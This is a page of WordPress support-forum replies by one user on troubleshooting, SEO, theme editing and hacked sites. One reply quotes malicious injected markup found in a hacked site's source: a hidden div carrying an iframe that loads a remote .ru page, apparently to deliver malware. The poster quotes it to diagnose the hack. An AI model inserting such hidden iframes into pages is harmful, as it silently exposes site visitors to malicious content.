iridiax
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: RSS Feed ErrorWhich index.php did you edit, the main WordPress one or your theme’s one? Never edit the main WordPress index.php, and if you did, use FTP to replace it with a freshly downloaded copy from WordPress.
Forum: Fixing WordPress
In reply to: Hacked: how to find malicious code?Instead of combing through everything, consider just cleaning it all out once you make sure you’ve backed it up. Replace what you can (like core WordPress files and plugins) with fresh copies and then just check whatever original files you do keep for hacked code. See: http://codex.wordpress.org/FAQ_My_site_was_hacked
Forum: Fixing WordPress
In reply to: White Screen of Death on 2.8.4, any solution?<div style="display:none">osencoxmmmfaabtivonobyazhsrxlci<iframe width=949 height=811 src="http://samsungicq.ru:8080/index.php" ></iframe></div>The above is in your source code. Your site has been hacked. See:
Forum: Fixing WordPress
In reply to: Pretty Big Problem for me I KnowDon’t paste Google Analytics code into your posts. Remove this pasted code and then validate your site again. If a plugin is adding this code, disable it.
Forum: Fixing WordPress
In reply to: WordPress page stopped loadingI tried to restore everything and that seemed to resolve the issue. The same thing happened again…
My hosting provider said that the index.php file was modified but I haven’t done anything for this to happen.
These can be signs of a hacked site.
Forum: Fixing WordPress
In reply to: description in the title tagTry a SEO or title tag plugin or look into using a conditional tag:
Forum: Fixing WordPress
In reply to: Unable to modify the footerHow old is your theme? I believe that get_settings() is depreciated. Check with the theme designer’s site for how to fix and to see if your theme has any updates.
Forum: Fixing WordPress
In reply to: Meta TagHowever, what if i want to appear when i search “medical coding Job” etc.
is that much harder?You’d need to have this phrase or these words somewhere on your page to appear in search engine results for them. BTW, the meta keywords tag is totally ignored by search engines, so don’t bother with it. If you want to rank higher for your keywords, look into using SEO on your site (a seo plugin is not enough by itself for this).
http://webdesign.about.com/od/seo/tp/seo_tips_and_tricks.htm
I assume that you are still working on your site because you currently have some very major code errors that need fixing.
Forum: Fixing WordPress
In reply to: Changing blog width?You’ll need to edit the css width in your theme’s style.css. You’ll probably have to adjust the width of more than one element.
Forum: Fixing WordPress
In reply to: Reserved words/params list?I’ve found no definitive list of reserved query string params
I haven’t either. There must be one somewhere, but I haven’t been able to find it in the Codex or by Googling.
Forum: Fixing WordPress
In reply to: Reserved words/params list?The minute I pass something like /mypage/?m=1, or ?year=2010, I get a 404 page instead.
You are improperly using WordPress query strings with your pages. The WordPress reserved query strings can be seen in the default permalinks. As for the 2010 query giving a 404, I’d imagine that there isn’t a 2010 WordPress archive yet since it’s in the future.
?year=2009 and ?m=2009 both get you the 2009 WordPress archive. If you are using pretty permalinks, then /date/2009/ would get you the same thing.
Forum: Fixing WordPress
In reply to: Reserved words/params list?Beware, the default permalinks always work (including date archives), even if you have pretty permalinks enabled.
Forum: Fixing WordPress
In reply to: Cannot log back in after changing the destination urlCheck with feedburner. These two subscriber counts probably use different methods.
Forum: Fixing WordPress
In reply to: Need help explaining WordPress stabilitythe website will go blank, a file will get corrupted, a plugin will stop working, errors will show on the website, yadda yadda. It’s a constant thing.
Have you checked for hacking? Hacking can be the cause of sudden mysterious errors (like parse errors), and unless you clean it up and close any security holes, files will just keep getting corrupted.